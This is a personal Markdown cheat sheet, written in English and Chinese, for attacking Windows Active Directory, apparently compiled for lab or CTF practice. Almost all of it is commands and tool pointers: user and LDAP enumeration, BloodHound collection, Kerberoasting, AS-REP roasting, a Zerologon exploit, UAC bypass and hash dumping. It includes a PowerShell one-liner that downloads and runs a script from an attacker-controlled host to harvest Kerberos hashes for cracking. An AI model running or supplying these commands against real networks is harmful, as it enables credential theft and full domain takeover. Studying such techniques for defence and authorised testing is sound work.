AD_note.md

AD

Common command

• List user
  • net user Machine
  • net user /domain AD
  • net user {Username} /domain list user detail
• List group
  • net group
  • net group /domain

Kerberoasting

• Get User Hash
• nidem/kerberoast
• Invoke-Kerberoast.ps1

  PS > Import-Module .\Invoke-Kerberoast.ps1
  PS > Invoke-Kerberoast -OutputFormat Hashcat
  

  • 然後拿去用 hashcat 爆
  • 或一氣呵成的

  powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('http://{MY_IP}/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt"
  

  • hashcat -m 13100
  • 或是 mimikatz 的 kerberos::list /export 可以把 ticket dump 出來，然後 python /usr/share/kerberoast/tgsrepcrack.py wordlist.txt <ticket filename> 爆破
• GetUserSPNs

  GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>
  

• setspn –q */*
• ref
  • Kerberos协议之Kerberoasting和SPN

BloodHound

• BloodHound
• 挖 AD 中的關係
• Use SharpHound to collect data on target machine
  • ./SharpHound.exe --collectionmethods All
• Run bloodhound server
  • 先啟動 neo4j
    • sudo neo4j console
    • 第一次需要設帳密
  • 跑 bloodhound
    • bloodhound
  • Upload Data
    • 上傳用 SharHound 拿到的東西

LDAP

• nmap -n -sV -p389 --script "ldap* and not brute" 10.10.10.175
• ldapsearch -x -H LDAP://10.10.10.182 -s base namingcontexts
• ldapsearch -H LDAP://10.10.10.182 -x -b "DC=cascade,DC=local"

Powerview

• 如果有使用者在登入狀態，可以從 memory 中偷帳密
• https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
• Import-Module .\PowerView.ps1
  • Get-NetLoggedon -ComputerName <computer>
• ref
  • PowerView: Active Directory Enumeration

ASREPRoast

• 若 user 沒有 DONT_REQ_PREAUTH 任何能都能傳 AS_REQ 給 DC
• rpcclient
  • rpcclient -U "<user (can be empty)>" <ip>
  • Enumerating Domain Users
    • enumdomusers
• impacket-GetNPUsers <domain>/ -usersfile ./username.txt -dc-ip <dc-ip>
• ref
  • https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast

Powershell script to enumerate all users

$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="samAccountType=805306368"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop
    } 
    Write-Host "------------------------"
}

必要時可以加 fillter $Searcher.filter="name=Jeff_Admin"

Zerologon (CVE-2020-1472)

• Tester
  • https://github.com/SecuraBV/CVE-2020-1472
  • Check if zerologon enable
• Exploit
  • zerologon cve-2020-1472
  • https://github.com/dirkjanm/CVE-2020-1472
  • Account password will become empty if success
• Use secretdump (--no-pass) get hash
• Reinstall password

Other

• Get-PassHashes.ps1
• UAC
  • https://github.com/turbo/zero2hero
  • Akagi.zip
• NTLM
  • 空 LM : aad3b435b51404eeaad3b435b51404ee
• [Kerbrute](https://github.com/ropnop/kerbrute/releases
• adPEAS
• Kerberos 驗證過程